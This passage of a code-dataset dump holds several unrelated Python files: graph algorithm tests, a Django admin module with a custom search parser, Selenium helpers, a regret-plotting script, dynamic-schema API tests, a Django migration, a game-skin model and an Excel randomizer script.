(3, 2, 7)]\n g = DirectedGraph(edges)\n print(g.get_edges(), g.get_vertices(), sep='\\n')\n\n\n print(\"\\nPDF - method is_valid_path() example 1\")\n 
print(\"--------------------------------------\")\n edges = [(0, 1, 10), (4, 0, 12), (1, 4, 15), (4, 3, 3),\n (3, 1, 5), (2, 1, 23), (3, 2, 7)]\n g = DirectedGraph(edges)\n test_cases = [[0, 1, 4, 3], [1, 3, 2, 1], [0, 4], [4, 0], [], [2]]\n for path in test_cases:\n print(path, g.is_valid_path(path))\n\n\n print(\"\\nPDF - method dfs() and bfs() example 1\")\n print(\"--------------------------------------\")\n edges = [(0, 1, 10), (4, 0, 12), (1, 4, 15), (4, 3, 3),\n (3, 1, 5), (2, 1, 23), (3, 2, 7)]\n g = DirectedGraph(edges)\n for start in range(5):\n print(f'{start} DFS:{g.dfs(start)} BFS:{g.bfs(start)}')\n\n\n print(\"\\nPDF - method has_cycle() example 1\")\n print(\"----------------------------------\")\n edges = [(0, 1, 10), (4, 0, 12), (1, 4, 15), (4, 3, 3),\n (3, 1, 5), (2, 1, 23), (3, 2, 7)]\n g = DirectedGraph(edges)\n\n edges_to_remove = [(3, 1), (4, 0), (3, 2)]\n for src, dst in edges_to_remove:\n g.remove_edge(src, dst)\n print(g.get_edges(), g.has_cycle(), sep='\\n')\n\n edges_to_add = [(4, 3), (2, 3), (1, 3), (4, 0)]\n for src, dst in edges_to_add:\n g.add_edge(src, dst)\n print(g.get_edges(), g.has_cycle(), sep='\\n')\n print('\\n', g)\n\n\n print(\"\\nPDF - dijkstra() example 1\")\n print(\"--------------------------\")\n edges = [(0, 1, 10), (4, 0, 12), (1, 4, 15), (4, 3, 3),\n (3, 1, 5), (2, 1, 23), (3, 2, 7)]\n g = DirectedGraph(edges)\n for i in range(5):\n print(f'DIJKSTRA {i} {g.dijkstra(i)}')\n g.remove_edge(4, 3)\n print('\\n', g)\n for i in range(5):\n print(f'DIJKSTRA {i} {g.dijkstra(i)}')\n","sub_path":"d_graph.py","file_name":"d_graph.py","file_ext":"py","file_size_in_byte":9584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"355880458","text":"from django.contrib import admin\nfrom base.models import *\nfrom base.forms import AdvancedSearchForm\nfrom django.forms.formsets import formset_factory\nfrom django.db.models import Q\nimport re\nfrom django.forms import Textarea\n\nclass StatusFilter(admin.SimpleListFilter):\n\n title = 'Status'\n \n parameter_name = 'status'\n \n def lookups(self, request, model_admin):\n properties = tuple((prop.id, prop.property) for prop in DescriptiveProperty.objects.all()) \n return properties\n\n def queryset(self, request, queryset):\n if self.value():\n prop_id = self.value()\n return queryset.filter(subjectproperty__property = prop_id)\n\nclass SubjectPropertyInline(admin.TabularInline):\n model = SubjectProperty\n fields = ['property', 'property_value', 'notes', 'last_mod_by']\n readonly_fields = ('last_mod_by',) \n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2, 'cols':40})},\n }\n ordering = ('property__order',)\n suit_classes = 'suit-tab suit-tab-general'\n \n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == 'property':\n kwargs[\"queryset\"] = DescriptiveProperty.objects.filter(Q(primary_type='SO') | Q(primary_type='AL'))\n return super(SubjectPropertyInline, self).formfield_for_foreignkey(db_field, request, **kwargs)\n \nclass MediaSubjectRelationsInline(admin.TabularInline):\n model = MediaSubjectRelations\n fields = ['media', 'relation_type', 'notes', 'last_mod_by']\n readonly_fields = ('last_mod_by',) \n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2, 'cols':40})},\n }\n suit_classes = 'suit-tab suit-tab-general' \n \n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == 'media':\n kwargs[\"queryset\"] = 
Media.objects.filter(type__type = 'publication')\n return super(MediaSubjectRelationsInline, self).formfield_for_foreignkey(db_field, request, **kwargs)\n \n def get_queryset(self, request):\n qs = super(MediaSubjectRelationsInline, self).get_queryset(request)\n return qs.filter(relation_type=2)\n \nclass SubjectSubjectRelationsInline(admin.TabularInline):\n model = SubjectSubjectRelations\n fk_name = \"subject1\"\n fields = ['subject2', 'relation_type', 'notes', 'last_mod_by']\n readonly_fields = ('last_mod_by',) \n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2, 'cols':40})},\n }\n suit_classes = 'suit-tab suit-tab-general' \n \nclass FileInline(admin.TabularInline):\n model = File\n fields = ['get_thumbnail', 'media', 'relation_type', 'notes', 'last_mod_by']\n readonly_fields = ('get_thumbnail', 'last_mod_by',) \n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2, 'cols':40})},\n }\n suit_classes = 'suit-tab suit-tab-files' \n \n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == 'media':\n kwargs[\"queryset\"] = Media.objects.filter(type__type = 'image/jpeg')\n return super(FileInline, self).formfield_for_foreignkey(db_field, request, **kwargs)\n \nclass SubjectAdmin(admin.ModelAdmin):\n readonly_fields = ('last_mod_by',) \n inlines = [SubjectPropertyInline, MediaSubjectRelationsInline, FileInline]\n search_fields = ['title']\n list_display = ('id1', 'id2', 'id3', 'desc1', 'desc2', 'desc3')\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2, 'cols':40})},\n }\n suit_form_tabs = (('general', 'General'), ('files', 'Files'))\n fieldsets = [\n (None, {\n 'classes': ('suit-tab', 'suit-tab-general'),\n 'fields': ['title', 'notes', 'last_mod_by']\n }),\n ]\n \n change_list_template = 'admin/base/subject/change_list.html'\n change_form_template = 'admin/base/change_form.html'\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n \n def save_formset(self, request, form, formset, change):\n instances = formset.save(commit=False)\n\n for instance in instances:\n if isinstance(instance, SubjectProperty) or isinstance(instance, MediaSubjectRelations): #Check if it is the correct type of inline\n instance.last_mod_by = request.user \n instance.save()\n \n def changelist_view(self, request, extra_context=None):\n extra_context = extra_context or {}\n extra_context['advanced_formset'] = 'test for context'\n return super(SubjectAdmin, self).changelist_view(request, extra_context=extra_context)\n \n def get_search_results(self, request, queryset, search_term):\n '''Override the regular keyword search to perform the advanced search\n \n Because of the modified search_form.html template, the search_term will be specially\n generated to work with this method. Each set of queries is delimited by ??? and takes\n the form [&AND/OR]PROPERTY___SEARCH_TYPE___[SEARCH_KEYWORDS]??? This search method will \n return inaccurate results if someone searches ??? 
as a keyword\n '''\n queryset, use_distinct = super(SubjectAdmin, self).get_search_results(request, queryset, search_term)\n\n query_rows = search_term.split('???') #list of queries from search_term\n\n # make sure we received list of queries\n if len(query_rows) > 0:\n \n for i, row in enumerate(query_rows):\n \n negate = False # whether the query will be negated\n connector = '' # AND/OR/NOTHING\n kwargs = {}\n current_query = Q()\n \n terms = row.split('___') \n \n if len(terms) >= 3:\n # we got at least the number of terms we need\n\n # CURRENT TERMS FORMAT: ([&AND/OR,] PROPERTY, [not_]SEARCH_TYPE, [SEARCH_KEYWORDS])\n \n # remove and save the operator, if present\n if terms[0].startswith('&'): \n connector = terms[0][1:]\n terms = terms[1:]\n\n # CURRENT TERMS FORMAT: (PROPERTY, [not_]SEARCH_TYPE, [SEARCH_KEYWORDS])\n \n # remove and save the negation, if present\n if terms[1].startswith('not'):\n negate = True\n terms[1] = terms[1][4:]\n\n # CURRENT TERMS FORMAT: (PROPERTY, SEARCH_TYPE, [SEARCH_KEYWORDS])\n \n # if this row is blank, than skip\n if (terms[2] == '') and (terms[1] != 'blank'):\n continue\n \n ########### PROBLEM: THIS IS VERY DEPENDENT ON THE DATA AND UNUM REMAINING AT ID 23\n # if search is for U Number, remove any non-numbers at the beginning\n if terms[0] == '23':\n d = re.search(\"\\d\", terms[2])\n if d is not None:\n start_index = d.start()\n terms[2] = terms[2][start_index:]\n ###########\n \n # create current query\n if terms[1] == 'blank':\n #if property is Any, then return all b/c query asks for doc with 'any' blank properties\n if terms[0] == '0':\n continue\n \n # BLANK is a special case negation (essentially a double negative), so handle differently\n if negate:\n current_query = Q(subjectproperty__property = terms[0])\n else:\n current_query = ~Q(subjectproperty__property = terms[0])\n \n else:\n kwargs = {str('subjectproperty__property_value__%s' % terms[1]) : str('%s' % terms[2])}\n\n # check if a property was selected and build the current query\n if terms[0] == '0':\n # if no property selected, than search thru ALL properties\n # use negation\n if negate:\n current_query = ~Q(**kwargs)\n else:\n current_query = Q(**kwargs)\n else:\n # use negation\n if negate:\n current_query = Q(Q(subjectproperty__property = terms[0]) & ~Q(**kwargs))\n else:\n current_query = Q(Q(subjectproperty__property = terms[0]) & Q(**kwargs))\n \n # modify query set\n if connector == 'AND':\n queryset = queryset.filter(current_query)\n elif connector == 'OR':\n queryset = queryset | self.model.objects.filter(current_query)\n else:\n if i == 0:\n # in this case, current query should be the first query, so no connector\n queryset = self.model.objects.filter(current_query)\n else:\n # if connector wasn't set, use &\n queryset = queryset.filter(current_query)\n \n return queryset.order_by('id').distinct(), use_distinct\n\nadmin.site.register(Subject, SubjectAdmin)\n\nclass MediaPropertyInline(admin.TabularInline):\n model = MediaProperty\n fields = ['property', 'property_value', 'notes', 'last_mod_by']\n readonly_fields = ('last_mod_by',) \n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2, 'cols':40})},\n }\n \n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == \"property\":\n kwargs[\"queryset\"] = DescriptiveProperty.objects.filter(Q(primary_type='MP') | Q(primary_type='AL'))\n return super(MediaPropertyInline, self).formfield_for_foreignkey(db_field, request, **kwargs)\n\nclass MediaAdmin(admin.ModelAdmin):\n 
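# Audit fields are read-only in the form; save_model/save_formset below\n # stamp last_mod_by with the requesting user on every save.\n 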
readonly_fields = ('created', 'modified', 'last_mod_by')\n fields = ['title', 'type', 'notes', 'created', 'modified', 'last_mod_by']\n list_display = ['title', 'type', 'notes', 'created', 'modified', 'last_mod_by']\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2})},\n }\n inlines = [MediaPropertyInline]\n search_fields = ['title', 'notes']\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n \n def save_formset(self, request, form, formset, change):\n instances = formset.save(commit=False)\n\n for instance in instances:\n if isinstance(instance, MediaProperty) : #Check if it is the correct type of inline\n instance.last_mod_by = request.user \n instance.save()\n \nadmin.site.register(Media, MediaAdmin)\n\nclass PersonOrgPropertyInline(admin.TabularInline):\n model = PersonOrgProperty\n extra = 3\n fields = ['property', 'property_value', 'last_mod_by']\n\nclass PersonOrgAdmin(admin.ModelAdmin):\n fields = ['title', 'notes', 'last_mod_by']\n inlines = [PersonOrgPropertyInline]\n search_fields = ['title']\n\nadmin.site.register(PersonOrg, PersonOrgAdmin)\n\nadmin.site.register(GlobalVars)\nadmin.site.register(MediaType)\n\nclass DescriptivePropertyAdmin(admin.ModelAdmin):\n readonly_fields = ('created', 'modified', 'last_mod_by')\n fields = ['property', 'primary_type', 'order', 'visible', 'notes', 'created', 'modified', 'last_mod_by']\n list_display = ['property', 'primary_type', 'order', 'visible', 'notes', 'created', 'modified', 'last_mod_by']\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2})},\n }\n search_fields = ['property']\n list_filter = ('primary_type', 'visible')\n list_editable = ('primary_type', 'order', 'visible', 'notes')\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n\nadmin.site.register(DescriptiveProperty, DescriptivePropertyAdmin)\nadmin.site.register(MediaProperty)\nadmin.site.register(FeaturedImgs)\n\nclass SubjectPropertyAdmin(admin.ModelAdmin):\n readonly_fields = ('created', 'modified', 'last_mod_by')\n fields = ['subject', 'property', 'property_value', 'notes', 'created', 'modified', 'last_mod_by']\n list_display = ['subject', 'property', 'property_value', 'notes', 'created', 'modified', 'last_mod_by']\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2})},\n }\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n\nadmin.site.register(SubjectProperty, SubjectPropertyAdmin)\nadmin.site.register(ResultProperty)\nadmin.site.register(Relations)\n\nclass MediaSubjectRelationsAdmin(admin.ModelAdmin):\n readonly_fields = ('created', 'modified', 'last_mod_by')\n fields = ['media', 'subject', 'relation_type', 'notes', 'created', 'modified', 'last_mod_by']\n list_display = ['media', 'subject', 'relation_type', 'notes', 'created', 'modified', 'last_mod_by']\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2})},\n }\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n\nadmin.site.register(MediaSubjectRelations, MediaSubjectRelationsAdmin)\n\nclass SubjectSubjectRelationsAdmin(admin.ModelAdmin):\n readonly_fields = ('created', 'modified', 'last_mod_by')\n fields = ['subject1', 'subject2', 'relation_type', 'notes', 'created', 'modified', 'last_mod_by']\n list_display = ['subject1', 'subject2', 'relation_type', 'notes', 'created', 'modified', 
'last_mod_by']\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2})},\n }\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n\nadmin.site.register(SubjectSubjectRelations, SubjectSubjectRelationsAdmin)\nadmin.site.register(MediaPersonOrgRelations)\nadmin.site.register(PersonOrgProperty)\n\nclass StatusAdmin(admin.ModelAdmin):\n readonly_fields = ('created', 'modified', 'last_mod_by')\n fields = ['status', 'notes', 'created', 'modified', 'last_mod_by']\n list_display = ['status', 'notes', 'created', 'modified', 'last_mod_by']\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2})},\n }\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n \nadmin.site.register(Status, StatusAdmin)","sub_path":"base/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":15253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"54593313","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/5/28 20:37\n# @Author : sunlin\n# @File : page.py\n# @Software: PyCharm\nimport datetime\nimport random\nimport string\nfrom selenium.common.exceptions import TimeoutException, NoSuchElementException\n\nfrom datetime import date, timedelta\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\ndef get_element(driver, loc):\n # ele = WebDriverWait(driver, 30).until(lambda x: x.find_element(*loc), message=\"没有找到元素\")\n # return ele\n try:\n WebDriverWait(driver, 30).until(EC.visibility_of_element_located(loc), message=\"not found element %s By %s \" % loc[::-1])\n return driver.find_element(*loc)\n except TimeoutException as msg:\n print(msg)\n # driver.close()\n\n\ndef get_phone():\n num_start = ['130', '131', '132', '135', '150', '152', '156', '185', '186', '138', '137', '187', '188', '180',\n '139']\n start = random.choice(num_start)\n end = ''.join(random.sample(string.digits, 8))\n res = start + end\n return res\n\n\ndef get_phone2():\n num_start = [\"4\", \"5\", \"6\", \"8\", \"9\"]\n start = random.choice(num_start)\n end = ''.join(random.sample(string.digits, 7))\n res = start + end\n return res\n\ndef get_phone3():\n # num_start = [\"4\", \"5\", \"6\", \"8\", \"9\"]\n # start = random.choice(num_start)\n end = ''.join(random.sample(string.digits, 7))\n res = end\n return res\n\n\n\ndef get_alert(driver):\n WebDriverWait(driver, 10, 0.5).until(EC.alert_is_present())\n a = driver.switch_to.alert\n msg = a.text\n print(msg)\n a.accept()\n return msg\n\n\ndef get_ID():\n # num_start = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"k\", \"P\", \"R\", \"S\", \"V\"]\n num_start = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"k\", \"P\", \"R\", \"S\", \"V\"]\n start = random.choice(num_start)\n end = ''.join(random.sample(string.digits, 6))\n end2 = ''.join(random.sample(string.digits, 1))\n num_end = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n end2 = random.choice(num_end)\n res = start + end + \"(\"+end2 +\")\"\n return res\n\n\ndef get_date(days=7):\n # 获取7天后的日期, days为具体几天后的日期\n data = (date.today() + timedelta(days=days)).strftime(\"%Y-%m-%d\")\n return data\n\n\ndef get_date2(days=7):\n # 获取7天后的日期, days为具体几天后的日期\n data = (date.today() + timedelta(days=days)).strftime(\"%Y-%m-%d %H:%M:%S\")\n return data\n\n\ndef runtime(func):\n def wrapper(*args):\n try:\n starttime = 
datetime.datetime.now()\n result = func(*args)\n endtime = datetime.datetime.now()\n run_time = (endtime - starttime).seconds\n print(\"程序运行的时间为:\" + str(run_time) + '秒')\n return result\n except Exception as msg:\n print(msg)\n\n return wrapper\n\n\nif __name__ == '__main__':\n # print(get_phone())\n # print(type(get_date()))\n # print(get_date2())\n ss = ''.join(random.sample(string.digits, 4))\n name1 = \"WDYQ\" + ''.join(random.sample(string.digits, 4))\n print(name1)\n print(type(ss))\n print(get_ID())\n","sub_path":"houtai/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"71526170","text":"# !/usr/bin/env python\n# coding: utf-8\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as ss\n\n\n# Getting Average regret and Confidence interval\ndef accumulative_regret_error(regret):\n time_horizon = [0]\n samples = len(regret[0])\n runs = len(regret)\n batch = samples / 10\n\n # Time horizon\n t = 0\n while True:\n t += 1\n if time_horizon[-1] + batch > samples:\n if time_horizon[-1] != samples:\n time_horizon.append(time_horizon[-1] + samples % batch)\n break\n time_horizon.append(time_horizon[-1] + batch)\n\n # Mean batch regret of R runs\n avg_batched_regret = []\n for r in range(runs):\n count = 0\n accumulative_regret = 0\n batch_regret = [0]\n for s in range(samples):\n count += 1\n accumulative_regret += regret[r][s]\n if count == batch:\n batch_regret.append(accumulative_regret)\n count = 0\n\n if samples % batch != 0:\n batch_regret.append(accumulative_regret)\n avg_batched_regret.append(batch_regret)\n\n regret = np.mean(avg_batched_regret, axis=0)\n\n # Confidence interval\n conf_regret = []\n freedom_degree = runs - 2\n for r in range(len(avg_batched_regret[0])):\n conf_regret.append(ss.t.ppf(0.95, freedom_degree) * ss.sem(np.array(avg_batched_regret)[:, r]))\n return time_horizon, regret, conf_regret\n\n\n# Regret Plotting\ndef regret_plotting(regret, classifier_count, data_points):\n colors = list(\"rgbcmyk\")\n # shape = ['--H', '--d', '--X', '--^', '--v', '--*', '--+']\n shape = ['--^', '--d', '--v']\n\n # Scatter Error bar with scatter plot\n for a in range(len(classifier_count)):\n horizon, batched_regret, error = accumulative_regret_error(np.array(regret[a]))\n plt.errorbar(horizon, batched_regret, error, color=colors[a])\n plt.plot(horizon, batched_regret, colors[a] + shape[a], label='K=' + str(classifier_count[a]))\n\n # Location of the legend\n plt.legend(loc='upper left', numpoints=1)\n # plt.title(\"Cumulative Regret for different numbers of classifiers for \" + str(data_points) + \" samples\")\n plt.ylabel(\"Cumulative Regret\")\n plt.xlabel(\"Number of Samples\")\n plt.savefig(\"output/final_plot/simple_\" + str(data_points) + \".png\", bbox_inches='tight')\n plt.close()\n\n\n# Reading Data\n# data_plot = [1000, 5000, 10000, 25000, 50000, 100000]\ndata_plot = [5000, 50000]\nclassifiers_count = [2, 3, 5]\n# classifiers_count = [2]\nruns = 20\n\n# Reading Files\nfor d in range(len(data_plot)):\n classifiers_regret = []\n for c in classifiers_count:\n fileName = \"output/regretFiles/2d/\" + str(data_plot[d]) + \"_\" + str(c) + \".txt\"\n resultFile = open(fileName)\n classifier_regret = []\n for r in range(runs):\n regrets = map(float, list(resultFile.readline().split(\"[\")[1].split(\"]\")[0].split(\", \")))\n classifier_regret.append(regrets)\n classifiers_regret.append(classifier_regret)\n resultFile.close()\n\n 
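# Draw one cumulative-regret figure for this sample size, overlaying\n # the curves for every classifier count read above.\n 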
regret_plotting(classifiers_regret, classifiers_count, data_plot[d])\n","sub_path":"plottingSynthetic1.py","file_name":"plottingSynthetic1.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"348652351","text":"from common_fixtures import * # NOQA\nfrom gdapi import ApiError\nfrom test_authorization import user_client # NOQA\nfrom test_authorization import service_client # NOQA\nfrom test_authorization import project_client # NOQA\n\nDEFINITION = '''\n {\n \"resourceFields\": {\n \"fooBar\": {\n \"type\": \"string\",\n \"description\": \"foo animal\"\n }\n }\n }\n '''\n\n\ndef test_schema_lifecycle(context, client, service_client): # NOQA\n schema = random_str() + 'Config'\n got_schema = client.by_id_schema(schema)\n assert got_schema is None\n\n made_schema = service_client.create_dynamic_schema(\n accountId=context.project.id,\n name=schema,\n parent='service',\n definition=DEFINITION,\n roles=[\"project\", \"owner\", \"member\"])\n\n service_client.wait_success(made_schema)\n\n got_schema = client.by_id_schema(schema)\n assert got_schema is not None\n\n assert got_schema.resourceFields.fooBar.type == 'string'\n assert got_schema.resourceFields.fooBar.description == 'foo animal'\n\n made_schema = service_client.reload(made_schema)\n made_schema.remove()\n service_client.wait_success(made_schema)\n\n got_schema = client.by_id_schema(schema)\n assert got_schema is None\n\n\ndef test_invalid_schema_definition(context, client, service_client): # NOQA\n with pytest.raises(ApiError) as e:\n service_client.create_dynamic_schema(\n accountId=context.project.id,\n name=random_str(),\n parent='service',\n definition='{\"fsadfasd\":\"fasdfdsf\",}',\n roles=[\"project\", \"owner\", \"member\"])\n assert e.value.error.status == 422\n assert e.value.error.fieldName == 'definition'\n\n\ndef test_schema_roles(service_client, user_client, project_client): # NOQA\n schema = random_str()\n got_schema = project_client.by_id_schema(schema)\n assert got_schema is None\n\n made_schema = service_client.create_dynamic_schema(\n name=schema,\n parent='baseMachineConfig',\n definition='''\n {\n \"resourceFields\": {\n \"fooBar\": {\n \"type\": \"string\",\n \"description\": \"foo animal\"\n }\n }\n }\n ''',\n roles=[\"project\"])\n\n service_client.wait_success(made_schema)\n\n project_client.reload_schema()\n\n auth_check(project_client.schema, schema, 'r', {\n 'fooBar': 'r'\n })\n\n made_schema = service_client.reload(made_schema)\n made_schema.remove()\n service_client.wait_success(made_schema)\n\n got_schema = project_client.by_id_schema(schema)\n assert got_schema is None\n\n made_schema2 = service_client.create_dynamic_schema(\n name=schema,\n parent='baseMachineConfig',\n definition='''\n {\n \"resourceMethods\" : [\"GET\", \"PUT\", \"DELETE\"],\n \"collectionMethods\" : [ \"GET\", \"POST\" ],\n \"resourceFields\": {\n \"fooBar\": {\n \"type\": \"string\",\n \"description\": \"foo animal\",\n \"create\": true,\n \"update\": true\n }\n }\n }\n ''',\n roles=[\"user\"])\n\n service_client.wait_success(made_schema2)\n\n user_client.reload_schema()\n\n auth_check(user_client.schema, schema, 'crud', {\n 'fooBar': 'cru'\n })\n\n made_schema2 = service_client.reload(made_schema2)\n made_schema2.remove()\n service_client.wait_success(made_schema2)\n\n got_schema = user_client.by_id_schema(schema)\n assert got_schema is 
None\n","sub_path":"tests/integration/cattletest/core/test_dynamic_schema.py","file_name":"test_dynamic_schema.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"4972672","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('web', '0003_auto_20141005_1317'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Associado',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Evento',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('data', models.DateTimeField(verbose_name=b'data de ocorrencia')),\n ('descricao', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Paciente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('usuario', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='evento',\n name='paciente',\n field=models.ForeignKey(to='web.Paciente'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='associado',\n name='paciente',\n field=models.ForeignKey(to='web.Paciente'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='associado',\n name='usuario',\n field=models.OneToOneField(to=settings.AUTH_USER_MODEL),\n preserve_default=True,\n ),\n ]\n","sub_path":"web/migrations/0004_auto_20141005_1320.py","file_name":"0004_auto_20141005_1320.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"347946090","text":"# -*- coding: utf-8 -*-\n\nfrom ...init import db\nfrom ..enums import Apps\nfrom ..skins import Skin as BaseSkin\nfrom .enums import Rarities, Qualities, Categories\nfrom .weapons import Weapon\n\n\nclass Skin(BaseSkin):\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.app = Apps.csgo\n\n weapon = db.ReferenceField(Weapon, required=True)\n\n stat_trak = db.BooleanField(required=True)\n souvenir = db.BooleanField(required=True)\n _quality = db.IntField(db_field=\"quality\", required=True)\n _rarity = db.StringField(db_field=\"rarity\", choices=Rarities)\n\n meta = {\n 'indexes': ['stat_trak', 'souvenir', '_quality', '_rarity']\n }\n\n @property\n def fullname(self):\n res = \"\"\n if self.stat_trak:\n res += \"StatTrak \"\n res += self.weapon.pk\n if self.souvenir:\n res += \" (Souvenir)\"\n res += \" | \" + self.name + \" \"\n res += \"(\" + self.quality.value + \")\"\n return res\n\n @property\n def market_hash_name(self):\n res = ''\n if self.weapon.category == Categories.knives:\n res += '★ '\n if self.souvenir:\n res += 'Souvenir '\n elif self.stat_trak:\n res += 'StatTrak™ '\n res += self.weapon.name.value + \" | \" + self.name\n return res\n\n @property\n def quality(self):\n return Qualities.from_int(self._quality)\n\n @quality.setter\n def quality(self, value):\n self._quality = value.to_int()\n\n @property\n def rarity(self):\n try:\n return Rarities[self._rarity]\n 
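# _rarity holds the enum member name (see the setter below); names that\n # are unset or no longer in Rarities raise KeyError and fall through to None.\n 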
except KeyError:\n return None\n\n @rarity.setter\n def rarity(self, value):\n self._rarity = value.name\n\n @classmethod\n def _parse_kwargs(cls, kwargs):\n if 'quality' in kwargs:\n try:\n kwargs['_quality'] = kwargs.pop('quality').to_int()\n except AttributeError:\n pass\n return super()._parse_kwargs(kwargs)\n","sub_path":"backend/src/models/csgo/skins.py","file_name":"skins.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"195057455","text":"from openpyxl import Workbook\nfrom datetime import datetime\nfrom sys import exit\nfrom os import system\nfrom random import uniform # returns floating-point value, use randint for integer value\nXLSX_Worker = Workbook()\nActive_XLSX = XLSX_Worker.active\nDatetime_Create = datetime.now()\n\nclass Randomize_App:\n def __init__(self, start_int, end_int, result, attempts):\n self.start_int = start_int\n self.end_int = end_int\n self.result = result\n self.attempts = attempts\n\n def Welcome_Intro(self):\n system(\"CLS\")\n print(\"Hello and Welcome To Randomize Cutout Generator\")\n print(\"Exclusively Created for EDA which uses bond paper to do data.\")\n print(\"Data will be automatically added to Excel... Choice the data at your own sake.\\n\")\n Active_XLSX.title = input('Please enter your name (Full Name) -> ')\n return\n\n def Intro_DataGet(self):\n print(\"Data Needed is 30 Attempts of Bond Paper Cutting\")\n print(\"Short Bond Paper Dimension is 8.5 x 11 which this concludes the possible range to cut from 2.54cm to 27.94\")\n print(\"Middle Cut is 13.97cm which should give a hint on where to start...\")\n print(\"Please specify range cm to generate...\")\n try:\n self.start_int = float(input(\"Input Starting Range in CM -> \"))\n self.end_int = float(input(\"Input Starting Range in CM -> \"))\n self.attempts = int(input(\"Input Retries, Will Represent as the Nth Column - > \"))\n print(\"Generating Data...\\n\")\n return\n except ValueError:\n self.start_int = 0\n self.end_int = 0\n print(\"Error, you just inputted a value that is not a integer...\")\n print(\"Rerun the program again... Exiting...\")\n exit(0)\n\n def Randomize(self):\n ColumnCount = 0\n #for Column_nth in Active_XLSX.iter_cols(min_col = 1, max_col=self.attempts, min_row=1, max_row=20):\n for Column_nth in range(1, self.attempts + 1):\n ColumnCount += 1\n for Row_nth in range(1, 31):\n self.result = round(uniform(self.start_int, self.end_int), 1)\n Active_XLSX.cell(column = ColumnCount, row = Row_nth, value = (str(self.result) + ' cm'))\n print('Column #',Column_nth,'[ Column Position -> ',ColumnCount,'], Returned Output {}'.format(self.result), 'cm @ ', Row_nth)\n XLSX_Worker.save(Active_XLSX.title + '.xlsx')\n \n def XLSX_CreateWorksheet(self): # unused instance\n XLSX_Worker.create_sheet(Datetime_Create.isoformat())\n\nInstance_1 = Randomize_App(0, 0, 0, 0)\n#Instance_1.XLSX_CreateWorksheet()\nInstance_1.Welcome_Intro()\nInstance_1.Intro_DataGet()\nInstance_1.Randomize()\n\nprint(\"Data Finished... Check\", Active_XLSX.title + '.xlsx On the location of this script... 
